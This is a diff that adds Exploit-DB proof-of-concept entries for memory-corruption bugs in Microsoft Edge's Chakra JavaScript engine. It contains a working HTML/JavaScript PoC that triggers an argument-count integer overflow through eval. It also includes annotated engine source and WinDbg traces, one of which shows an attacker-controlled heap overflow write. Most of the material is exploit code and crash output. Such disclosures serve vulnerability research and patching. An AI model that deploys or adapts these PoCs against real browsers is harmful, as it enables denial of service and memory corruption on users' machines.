+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
+chakra!EmitArgs+0xddda3:
+00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
+0:016> ub
+chakra!EmitArgListEnd+0xdde2c:
+00007ffd`2da3130c 0f856022f2ff    jne     chakra!EmitArgListEnd+0x92 (00007ffd`2d953572)
+00007ffd`2da31312 0fb7c6          movzx   eax,si
+00007ffd`2da31315 e95b22f2ff      jmp     chakra!EmitArgListEnd+0x95 (00007ffd`2d953575)
+00007ffd`2da3131a 410fb7c4        movzx   eax,r12w
+00007ffd`2da3131e 664403e2        add     r12w,dx
+00007ffd`2da31322 0fb7cf          movzx   ecx,di
+00007ffd`2da31325 03ca            add     ecx,edx
+00007ffd`2da31327 488b942498000000 mov     rdx,qword ptr [rsp+98h]
+0:016> u
+chakra!EmitArgs+0xddda3:
+00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx
+00007ffd`2da31334 488d4c2440      lea     rcx,[rsp+40h]
+00007ffd`2da31339 488b4328        mov     rax,qword ptr [rbx+28h]
+00007ffd`2da3133d 48894c2420      mov     qword ptr [rsp+20h],rcx
+00007ffd`2da31342 488bcd          mov     rcx,rbp
+00007ffd`2da31345 448b400c        mov     r8d,dword ptr [rax+0Ch]
+00007ffd`2da31349 e8229c2300      call    chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70)
+00007ffd`2da3134e 0fb77c2440      movzx   edi,word ptr [rsp+40h]
+0:016> kb
+RetAddr           : Args to Child                                                           : Call Site
+00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3
+00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c
+00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c
+00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8
+00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5
+00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80
+00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75
+00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75
+00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164
+00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142
+00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d
+00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380
+00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231
+00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
+00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d
+00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93
+00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
+00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
+00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
+00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c
+00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
+0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
+00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2
+00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93
+00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
+00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
+00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a
+00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124
+00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
+00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
+00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
+00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
+00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
+00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357
+00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
+00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
+00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204
+00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1
+00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
+00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63
+00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3
+00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
+00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23
+00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b
+00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
+00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
+00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
+00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
+00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
+00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280
+00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
+00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
+00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
+00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
+00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
+00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
+
+
+The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList
+//ChakraCore-master\lib\Parser\Parse.cpp
+/***************************************************************************
+Parse a list of arguments.
+***************************************************************************/
+template<bool buildAST>
+ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount)
+{
+    ParseNodePtr pnodeArg;
+    ParseNodePtr pnodeList = nullptr;
+    ParseNodePtr *lastNodeRef = nullptr;
+
+    // Check for an empty list
+    Assert(m_token.tk == tkLParen);
+
+    if (m_pscan->Scan() == tkRParen)
+    {
+        return nullptr;
+    }
+
+    *pCallOfConstants = true;
+    *pSpreadArgCount = 0;
+
+    int count=0;
+    while (true)
+    {
+        // the count of arguments has to fit in an unsigned short
+        if (count > 0xffffU)                    //SHOULD BE if (count >= oxffffU)
+            Error(ERRnoMemory);
+        // Allow spread in argument lists.
+        IdentToken token;
+        pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token);
+        ++count;                                //when count==0xffffU, an overflow occurs HERE!!!
+        this->MarkEscapingRef(pnodeArg, &token);
+
+        if (buildAST)
+        {
+            this->CheckArguments(pnodeArg);
+
+            if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg))
+            {
+                *pCallOfConstants = false;
+            }
+
+            if (pnodeArg->nop == knopEllipsis)
+            {
+                (*pSpreadArgCount)++;
+            }
+
+            AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg);
+        }
+        if (m_token.tk != tkComma)
+        {
+            break;
+        }
+        m_pscan->Scan();
+
+        if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled())
+        {
+            break;
+        }
+    }
+
+    if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){
+        CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext);
+    }
+
+    *pCount = static_cast<uint16>(count);
+    if (buildAST)
+    {
+        AssertMem(lastNodeRef);
+        AssertNodeMem(*lastNodeRef);
+        pnodeList->ichLim = (*lastNodeRef)->ichLim;
+    }
+
+    return pnodeList;
+}
+-->
+<html>
+<head>
+<title> POC </title>
+</head>
+<script>
+
+var a=[];
+a.length=0xFFFF+1;
+a.fill('...a'); 
+var b="function Car(){}; var car=new Car("+a.join()+");";
+//alert(b);
+eval(b);
+
+</script>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/dos/42468.html b/platforms/windows/dos/42468.html
new file mode 100755
index 000000000..2a31f4c61
--- /dev/null
+++ b/platforms/windows/dos/42468.html
@@ -0,0 +1,294 @@
+<!--
+Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
+
+This is the HEAP BASED OVERFLOW version of the issue.
+
+	// ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
+    Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
+    {
+
+		[...]
+
+        if (!isAsmJs && executeFunction->IsCoroutine())
+        {
+            [...]
+        }
+        else
+        {
+            InterpreterStackFrame::Setup setup(function, args);
+            size_t varAllocCount = setup.GetAllocationVarCount();
+			//printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
+            size_t varSizeInBytes = varAllocCount * sizeof(Var);
+
+            //
+            // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
+            //
+            DWORD_PTR stackAddr;
+
+            // If the locals area exceeds a certain limit, allocate it from a private arena rather than
+            // this frame. The current limit is based on an old assert on the number of locals we would allow here.
+            if (varAllocCount > InterpreterStackFrame::LocalsThreshold)					//we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
+            {
+                ArenaAllocator *tmpAlloc = nullptr;
+                fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
+                allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
+                stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
+            }
+            else
+            {
+                PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
+                allocation = (Var*)_alloca(varSizeInBytes);
+#if DBG
+                memset(allocation, 0xFE, varSizeInBytes);
+#endif
+                stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
+            }
+
+		[...]
+        return aReturn;
+    }
+	
+	
+	
+	
+
+Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+*** wait with pending attach
+Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
+Executable search path is: 
+ModLoad: 00007ff7`49700000 00007ff7`49725000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
+ModLoad: 00007ffa`13700000 00007ffa`138db000   C:\Windows\SYSTEM32\ntdll.dll
+ModLoad: 00007ffa`119f0000 00007ffa`11a9e000   C:\Windows\System32\KERNEL32.DLL
+ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000   C:\Windows\System32\KERNELBASE.dll
+ModLoad: 00007ffa`0e140000 00007ffa`0e1be000   C:\Windows\SYSTEM32\apphelp.dll
+ModLoad: 00007ffa`11b80000 00007ffa`11e79000   C:\Windows\System32\combase.dll
+ModLoad: 00007ffa`103f0000 00007ffa`104e6000   C:\Windows\System32\ucrtbase.dll
+ModLoad: 00007ffa`11160000 00007ffa`11285000   C:\Windows\System32\RPCRT4.dll
+ModLoad: 00007ffa`104f0000 00007ffa`1055a000   C:\Windows\System32\bcryptPrimitives.dll
+ModLoad: 00007ffa`11630000 00007ffa`116cd000   C:\Windows\System32\msvcrt.dll
+ModLoad: 00007ffa`0a400000 00007ffa`0a460000   C:\Windows\SYSTEM32\wincorlib.DLL
+ModLoad: 00007ffa`10c90000 00007ffa`10d50000   C:\Windows\System32\OLEAUT32.dll
+ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000   C:\Windows\System32\msvcp_win.dll
+ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000   C:\Windows\System32\kernel.appcore.dll
+ModLoad: 00007ff9`f3680000 00007ff9`f3a44000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
+ModLoad: 00007ffa`10560000 00007ffa`10c52000   C:\Windows\System32\Windows.Storage.dll
+ModLoad: 00007ffa`11940000 00007ffa`119e1000   C:\Windows\System32\advapi32.dll
+ModLoad: 00007ffa`11b20000 00007ffa`11b79000   C:\Windows\System32\sechost.dll
+ModLoad: 00007ffa`113e0000 00007ffa`11431000   C:\Windows\System32\shlwapi.dll
+ModLoad: 00007ffa`10c60000 00007ffa`10c87000   C:\Windows\System32\GDI32.dll
+ModLoad: 00007ffa`10200000 00007ffa`10388000   C:\Windows\System32\gdi32full.dll
+ModLoad: 00007ffa`10d60000 00007ffa`10eaa000   C:\Windows\System32\USER32.dll
+ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000   C:\Windows\System32\win32u.dll
+ModLoad: 00007ffa`11790000 00007ffa`1183a000   C:\Windows\System32\shcore.dll
+ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000   C:\Windows\System32\powrprof.dll
+ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000   C:\Windows\System32\profapi.dll
+ModLoad: 00007ffa`08380000 00007ffa`08606000   C:\Windows\SYSTEM32\iertutil.dll
+ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000   C:\Windows\SYSTEM32\ntmarta.dll
+ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000   C:\Windows\SYSTEM32\USERENV.dll
+ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000   C:\Windows\SYSTEM32\clipc.dll
+ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000   C:\Windows\SYSTEM32\DNSAPI.dll
+ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000   C:\Windows\SYSTEM32\cryptsp.dll
+ModLoad: 00007ffa`115b0000 00007ffa`1161c000   C:\Windows\System32\WS2_32.dll
+ModLoad: 00007ffa`10d50000 00007ffa`10d58000   C:\Windows\System32\NSI.dll
+ModLoad: 00007ffa`11730000 00007ffa`1175d000   C:\Windows\System32\IMM32.DLL
+ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
+ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000   C:\Windows\SYSTEM32\twinapi.appcore.dll
+ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000   C:\Windows\SYSTEM32\bcrypt.dll
+ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000   C:\Windows\SYSTEM32\profext.dll
+ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000   C:\Windows\SYSTEM32\msiso.dll
+ModLoad: 00007ffa`054d0000 00007ffa`054f2000   C:\Windows\SYSTEM32\EShims.dll
+ModLoad: 00007ffa`045d0000 00007ffa`045eb000   C:\Windows\SYSTEM32\MPR.dll
+ModLoad: 00007ffa`11290000 00007ffa`113d5000   C:\Windows\System32\ole32.dll
+ModLoad: 00007ffa`0e370000 00007ffa`0e405000   C:\Windows\system32\uxtheme.dll
+ModLoad: 00007ff9`f1650000 00007ff9`f2d01000   C:\Windows\SYSTEM32\edgehtml.dll
+ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000   C:\Windows\SYSTEM32\wintypes.dll
+ModLoad: 00007ff9`f0e60000 00007ff9`f164b000   C:\Windows\SYSTEM32\chakra.dll
+ModLoad: 00007ffa`04630000 00007ffa`0466f000   C:\Windows\SYSTEM32\MLANG.dll
+ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000   C:\Windows\SYSTEM32\policymanager.dll
+ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000   C:\Windows\SYSTEM32\msvcp110_win.dll
+ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000   C:\Windows\SYSTEM32\PROPSYS.dll
+ModLoad: 00007ffa`04d30000 00007ffa`04dfb000   C:\Windows\System32\ieproxy.dll
+ModLoad: 00007ffa`09f90000 00007ffa`0a096000   C:\Windows\System32\Windows.UI.dll
+ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000   C:\Windows\SYSTEM32\TextInputFramework.dll
+ModLoad: 00007ffa`0b640000 00007ffa`0b912000   C:\Windows\SYSTEM32\CoreUIComponents.dll
+ModLoad: 00007ffa`0da10000 00007ffa`0daf3000   C:\Windows\SYSTEM32\CoreMessaging.dll
+ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000   C:\Windows\SYSTEM32\usermgrcli.dll
+ModLoad: 00007ffa`0abe0000 00007ffa`0b111000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+ModLoad: 00007ffa`11e80000 00007ffa`132b7000   C:\Windows\System32\shell32.dll
+ModLoad: 00007ffa`101b0000 00007ffa`101f9000   C:\Windows\System32\cfgmgr32.dll
+ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000   C:\Windows\SYSTEM32\dwmapi.dll
+ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000   C:\Windows\SYSTEM32\WININET.dll
+ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000   C:\Windows\SYSTEM32\SspiCli.dll
+ModLoad: 00007ffa`11440000 00007ffa`115a6000   C:\Windows\System32\msctf.dll
+ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000   C:\Windows\SYSTEM32\mrmcorer.dll
+ModLoad: 00007ff9`fddf0000 00007ff9`fde00000   C:\Windows\SYSTEM32\tokenbinding.dll
+ModLoad: 00007ffa`00260000 00007ffa`0027b000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
+ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000   C:\Windows\SYSTEM32\Bcp47Langs.dll
+ModLoad: 00007ffa`07430000 00007ffa`07507000   C:\Windows\SYSTEM32\winhttp.dll
+ModLoad: 00007ffa`0f420000 00007ffa`0f47c000   C:\Windows\system32\mswsock.dll
+ModLoad: 00007ffa`0a730000 00007ffa`0a73b000   C:\Windows\SYSTEM32\WINNSI.DLL
+ModLoad: 00007ffa`07260000 00007ffa`07428000   C:\Windows\SYSTEM32\urlmon.dll
+ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
+ModLoad: 00007ff9`fe760000 00007ff9`fe77a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
+ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000   C:\Windows\SYSTEM32\ieapfltr.dll
+ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000   C:\Windows\System32\rmclient.dll
+ModLoad: 00007ff9`fd750000 00007ff9`fd768000   C:\Windows\System32\UiaManager.dll
+ModLoad: 00007ff9`fb720000 00007ff9`fb767000   C:\Windows\system32\dataexchange.dll
+ModLoad: 00007ffa`0d180000 00007ffa`0d45f000   C:\Windows\SYSTEM32\d3d11.dll
+ModLoad: 00007ffa`0db30000 00007ffa`0dc52000   C:\Windows\SYSTEM32\dcomp.dll
+ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000   C:\Windows\SYSTEM32\dxgi.dll
+ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000   C:\Windows\system32\twinapi.dll
+ModLoad: 00007ffa`060c0000 00007ffa`060e8000   C:\Windows\SYSTEM32\srpapi.dll
+ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000   C:\Windows\System32\CRYPT32.dll
+ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000   C:\Windows\System32\MSASN1.dll
+ModLoad: 00007ff9`f8480000 00007ff9`f84fa000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
+ModLoad: 00007ff9`ff120000 00007ff9`ff17d000   C:\Windows\SYSTEM32\ninput.dll
+ModLoad: 00007ffa`0d460000 00007ffa`0da04000   C:\Windows\SYSTEM32\d2d1.dll
+ModLoad: 00007ffa`06cf0000 00007ffa`06faf000   C:\Windows\SYSTEM32\DWrite.dll
+ModLoad: 00007ff9`f8060000 00007ff9`f80ba000   C:\Windows\System32\Windows.Graphics.dll
+ModLoad: 00007ffa`06950000 00007ffa`0695f000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
+ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000   C:\Windows\SYSTEM32\vm3dum64.dll
+ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000   C:\Windows\SYSTEM32\D3D10Level9.dll
+ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000   C:\Windows\System32\oleacc.dll
+ModLoad: 00007ffa`06480000 00007ffa`06490000   C:\Windows\system32\msimtf.dll
+ModLoad: 00007ffa`06ab0000 00007ffa`06b38000   C:\Windows\system32\directmanipulation.dll
+ModLoad: 00007ff9`fe370000 00007ff9`fe411000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
+ModLoad: 00007ffa`06760000 00007ffa`06774000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
+ModLoad: 00007ffa`05a10000 00007ffa`05a48000   C:\Windows\System32\smartscreenps.dll
+ModLoad: 00007ffa`06b40000 00007ffa`06cc8000   C:\Windows\SYSTEM32\windows.globalization.dll
+(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)
+chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
+00007ff9`f124bcad 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
+0:016> r
+rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
+rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
+rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10
+ r8=0000015e3d500030  r9=0000015e2c538000 r10=000000388f1fb918
+r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120
+r14=0000000000000000 r15=0000015e4063f9b3
+iopl=0         nv up ei pl nz ac pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010210
+chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
+00007ff9`f124bcad 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
+0:016> dq ecx
+0000015e`3d5401b0  00000000`00000000 00010000`42424242
+0000015e`3d5401c0  00010000`42424242 00010000`42424242
+0000015e`3d5401d0  00010000`42424242 00010000`42424242
+0000015e`3d5401e0  00010000`42424242 00010000`42424242
+0000015e`3d5401f0  00010000`42424242 00010000`42424242
+0000015e`3d540200  00010000`42424242 00010000`42424242
+0000015e`3d540210  00010000`42424242 00010000`42424242
+0000015e`3d540220  00010000`42424242 00010000`42424242
+
+0:016> dq [ecx+edx*8]
+0000015e`3d550000  ????????`???????? ????????`????????
+0000015e`3d550010  ????????`???????? ????????`????????
+0000015e`3d550020  ????????`???????? ????????`????????
+0000015e`3d550030  ????????`???????? ????????`????????
+0000015e`3d550040  ????????`???????? ????????`????????
+0000015e`3d550050  ????????`???????? ????????`????????
+0000015e`3d550060  ????????`???????? ????????`????????
+0000015e`3d550070  ????????`???????? ????????`????????
+0:016> !address ecx
+
+                                     
+Failed to map Heaps (error 8007001e)
+Usage:                  <unclassified>
+Allocation Base:        0000015e`3d500000
+Base Address:           0000015e`3d500000
+End Address:            0000015e`3d550000
+Region Size:            00000000`00050000
+Type:                   00020000	MEM_PRIVATE
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+
+0:016> !address 0000015e`3d550000
+Usage:                  Free
+Base Address:           0000015e`3d550000
+End Address:            0000015e`3d7f0000
+Region Size:            00000000`002a0000
+Type:                   00000000	
+State:                  00010000	MEM_FREE
+Protect:                00000001	PAGE_NOACCESS
+
